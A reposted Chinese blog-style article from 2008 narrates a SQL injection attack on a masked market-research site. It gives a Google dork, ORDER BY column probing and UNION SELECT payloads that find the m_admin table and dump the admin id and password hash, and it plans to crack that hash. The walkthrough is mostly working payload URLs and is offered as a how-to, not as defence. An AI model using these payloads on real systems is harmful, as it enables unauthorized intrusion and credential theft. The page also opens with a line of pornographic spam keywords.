欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

詳述php滲透全過程(組圖)

互聯(lián)網(wǎng)   發(fā)布時間:2008-10-08 19:35:57   作者:佚名   我要評論
最近一直比較關(guān)注PHP注射的東西.學(xué)習(xí)好幾天了.也應(yīng)該實戰(zhàn)一下了.目標http://app.xxxx.com .一個市場調(diào)查的門戶.找注射點嘛,還是要用我們可愛的搜索引擎.為什么可愛呢?一會就知道了.Go Go Go !!!!! 在google中搜索php?id= site:xxx.com.意思就是說搜索XXX網(wǎng)站中以php?
http://app.xxx.com/cati/article_literature.php?id=11 order by 9



返回正常說明它有9個字段.OK.現(xiàn)在我們知道它的字段那我們就來爆它的管理員吧 呵呵.

http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9


出現(xiàn)了一些數(shù)字,一會那個地方會出現(xiàn)我們想要的東西。呵呵,.經(jīng)過返回的測試,確定表段為m_admin.

http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,2,3,4,5,6,7,8,9 from m_admin



返回正常說明存在m_admin標段.接下來我們猜字段.,還記的剛才爆出那個幾個數(shù)字吧,對應(yīng)我們的URL的數(shù)字.我們用字段名去替換掉它.在頁面里就會顯示出我們需要的內(nèi)容了.最后只能檢出倆個字段.一個為password 一個為id

http://app.xxx.com/cati/article_literature.php?id=11 and 1=2 union select 1,id,3,4,5,6,7,password,9 from m_admin



2和8的位置出現(xiàn)了我們想要的東西..可惜的沒有檢測到用戶名的字段,不過沒關(guān)系,應(yīng)該是admin,或administrator.應(yīng)該問題不大?,F(xiàn)在去破解下那個32位的MD5,看看是不是弱口令

相關(guān)文章

最新評論